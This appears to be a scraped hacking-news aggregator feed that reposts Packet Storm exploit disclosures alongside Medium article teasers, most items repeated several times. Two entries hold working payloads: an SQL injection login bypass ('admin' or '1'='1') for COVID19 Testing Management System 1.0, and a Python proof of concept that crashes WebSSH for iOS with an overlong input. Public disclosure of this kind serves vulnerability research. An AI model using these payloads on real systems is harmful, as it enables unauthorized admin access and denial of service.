Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
COVID19 Testing Management System 1.0 SQL Injection
https://3.bp.blogspot.com/-L1ywDwIvHnM/WWlvbqBqi6I/AAAAAAAAIPQ/e-y1sGxHKpMGeO7A8b-5LHWSXrbuRWhUwCLcBGAs/s1600/h73.png
COVID19 Testing Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
COVID19 Testing Management System 1.0 SQL Injection
https://3.bp.blogspot.com/-L1ywDwIvHnM/WWlvbqBqi6I/AAAAAAAAIPQ/e-y1sGxHKpMGeO7A8b-5LHWSXrbuRWhUwCLcBGAs/s1600/h73.png
COVID19 Testing Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
a5e373fba80ab6c8d5178ece6d4685ffDownload
# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass)
# Date: 19/05/2021
# Exploit Author: Rohit Burke
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10
SQL Injection:
Injection flaws, such as SQL, NoSQL, and LDAP injection, occur when
untrusted data is sent to an interpreter as part of a command or query. The
attacker’s hostile data can trick the interpreter into executing unintended
commands or accessing data without proper authorization.
Attack vector:
An attacker can gain admin panel access using malicious sql injection queries.
Steps to reproduce:
1) Open admin login page using following URl:
"http://localhost/covid-tms/login.php"
2) Now put the payload below the Username and password field.
Payload: admin' or '1'='1 and you will be successfully logged In as Admin without any credentials.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
COVID19 Testing Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WebSSH For iOS 14.16.10 Denial Of Service
https://3.bp.blogspot.com/-BKQJl1oXbqE/WWlvQjSZMJI/AAAAAAAAINE/UWb7sXt4uvssyXVrWpwrINbeIcIr93_vACLcBGAs/s1600/h33.png
WebSSH for iOS version 14.16.10 suffers from a denial of service vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WebSSH For iOS 14.16.10 Denial Of Service
https://3.bp.blogspot.com/-BKQJl1oXbqE/WWlvQjSZMJI/AAAAAAAAINE/UWb7sXt4uvssyXVrWpwrINbeIcIr93_vACLcBGAs/s1600/h33.png
WebSSH for iOS version 14.16.10 suffers from a denial of service vulnerability.
MD5 |
96d5a3d99c9f2c80b466a1262bc3ad37Download
# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
# Author: Luis Martinez
# Discovery Date: 2021-05-18
# Vendor Homepage: https://apps.apple.com/mx/app/webssh-ssh-client/id497714887
# Software Link: App Store for iOS devices
# Tested Version: 14.16.10
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 14.5.1
# Steps to Produce the Crash:
# 1.- Run python code: WebSSH_for_iOS_14.16.10.py
# 2.- Copy content to clipboard
# 3.- Open "WebSSH for iOS"
# 4.- Click -> Tools
# 5.- Click -> mashREPL
# 6.- Paste ClipBoard on "mashREPL>"
# 7.- Intro
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 300
print (buffer)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WebSSH For iOS 14.16.10 Denial Of Service
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Internet World
https://cdn-images-1.medium.com/max/900/1*WBRwjY_6jVG2Q7N2v9DYdw.jpeg
This century can be called as 21st century or Century of internet. Everyone uses Smart phones and internet directly or indirectly. In…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Internet World
https://cdn-images-1.medium.com/max/900/1*WBRwjY_6jVG2Q7N2v9DYdw.jpeg
This century can be called as 21st century or Century of internet. Everyone uses Smart phones and internet directly or indirectly. In…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Internet World
This century can be called as 21st century or Century of internet. Everyone uses Smart phones and internet directly or indirectly. In…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe | Lian_YU Walkthrough
https://cdn-images-1.medium.com/max/2600/1*WvjX0Gjf735XJANWvCZ_dA.jpeg
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe | Lian_YU Walkthrough
https://cdn-images-1.medium.com/max/2600/1*WvjX0Gjf735XJANWvCZ_dA.jpeg
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe | Lian_YU Walkthrough
Introduction
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hacking #1 - How should I think?
https://cdn-images-1.medium.com/max/2600/1*KGJzt9ppvox08ed7JbiXuA.jpeg
Are you curious about how things work, how to think and how to hack? Join me as I explain the process I’ve been using for the last 18…
Continue reading on strike.sh »
___________________________
@hacking_Attack
@Hacking_Video
Hacking #1 - How should I think?
https://cdn-images-1.medium.com/max/2600/1*KGJzt9ppvox08ed7JbiXuA.jpeg
Are you curious about how things work, how to think and how to hack? Join me as I explain the process I’ve been using for the last 18…
Continue reading on strike.sh »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hacking #1 - How should I think?
Are you curious about how things work, how to think and how to hack? Join me as I explain the process I’ve been using for the last 18…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Common types of cyber threats
https://cdn-images-1.medium.com/max/819/1*MT4h9TYCvScaOKrJ8gS4mg.jpeg
There are ten common types of cyber threats:
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Common types of cyber threats
https://cdn-images-1.medium.com/max/819/1*MT4h9TYCvScaOKrJ8gS4mg.jpeg
There are ten common types of cyber threats:
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Common types of cyber threats
There are ten common types of cyber threats:
Hacking Articles Tips Tricks Videos Tutorials
GIF
Hacking on Medium
⏎Avoiding Common OSCP Pitfalls
https://cdn-images-1.medium.com/max/600/1*0H5Is-JnD7SWLeG4Vy--RQ.gif
Learn from painfully common mistakes that contributed to my initial failure and how to pass the Offensive Security Certified Professional…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
⏎Avoiding Common OSCP Pitfalls
https://cdn-images-1.medium.com/max/600/1*0H5Is-JnD7SWLeG4Vy--RQ.gif
Learn from painfully common mistakes that contributed to my initial failure and how to pass the Offensive Security Certified Professional…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
⏎Avoiding Common OSCP Pitfalls🕳
Learn from painfully common mistakes that contributed to my initial failure and how to pass the Offensive Security Certified Professional…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
La nueva amenaza del ransomware: triple extorsión.
https://cdn-images-1.medium.com/max/930/0*0AEbLwWmExI1cfxt
PUBLICADO EN 18 MAYO, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
La nueva amenaza del ransomware: triple extorsión.
https://cdn-images-1.medium.com/max/930/0*0AEbLwWmExI1cfxt
PUBLICADO EN 18 MAYO, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
La nueva amenaza del ransomware: triple extorsión.
PUBLICADO EN 18 MAYO, 2021 POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hub Weekly Digest: Confidential Computing, SolarWinds Breach, EU Cyberattack, and Rapid7 Hack
https://cdn-images-1.medium.com/max/2600/1*GLUVpekKIUAenQrRXcCIPw.jpeg
Hub Security’s weekly digest covers top stories happening around the world related to fintech, critical infrastructure, cloud, and…
Continue reading on HUB Security »
___________________________
@hacking_Attack
@Hacking_Video
Hub Weekly Digest: Confidential Computing, SolarWinds Breach, EU Cyberattack, and Rapid7 Hack
https://cdn-images-1.medium.com/max/2600/1*GLUVpekKIUAenQrRXcCIPw.jpeg
Hub Security’s weekly digest covers top stories happening around the world related to fintech, critical infrastructure, cloud, and…
Continue reading on HUB Security »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hub Weekly Digest: Confidential Computing, SolarWinds Breach, EU Cyberattack, and Rapid7 Hack
Hub Security’s weekly digest covers top stories happening around the world related to fintech, critical infrastructure, cloud, and…
Install Go Lang on Kali Linux
https://medium.com/@sherlock297/install-go-lang-on-kali-linux-6b4d5cfff2e?source=rss------bug_bounty-5
▶ Enable root mode : sudo su
▶ Check for the updates : apt update
▶ Install Updates if available : apt upgrade
▶ Check go lang is…Continue reading on Medium » (https://medium.com/@sherlock297/install-go-lang-on-kali-linux-6b4d5cfff2e?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@sherlock297/install-go-lang-on-kali-linux-6b4d5cfff2e?source=rss------bug_bounty-5
▶ Enable root mode : sudo su
▶ Check for the updates : apt update
▶ Install Updates if available : apt upgrade
▶ Check go lang is…Continue reading on Medium » (https://medium.com/@sherlock297/install-go-lang-on-kali-linux-6b4d5cfff2e?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Install Go Lang on Kali Linux
▶ Enable root mode : sudo su ▶ Check for the updates : apt update ▶ Install Updates if available : apt upgrade ▶ Check go lang is…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Evasor : A Tool To Be Used In Post Exploitation Phase For Blue
The Evasor is an automated security assessment tool which locates existing executables on the Windows operating system that can be used to bypass any Application Control rules. It is very easy to use, quick, saves time and fully automated which generates for you a report including description, screenshots and mitigations suggestions, suites for both blue […]
The post Evasor : A Tool To Be Used In Post Exploitation Phase For Blue appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Evasor : A Tool To Be Used In Post Exploitation Phase For Blue
The Evasor is an automated security assessment tool which locates existing executables on the Windows operating system that can be used to bypass any Application Control rules. It is very easy to use, quick, saves time and fully automated which generates for you a report including description, screenshots and mitigations suggestions, suites for both blue […]
The post Evasor : A Tool To Be Used In Post Exploitation Phase For Blue appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Evasor : A Tool To Be Used In Post Exploitation Phase.
This is an automated security assessment tool which locates existing executables on the Windows operating system to bypass any Application Control policies.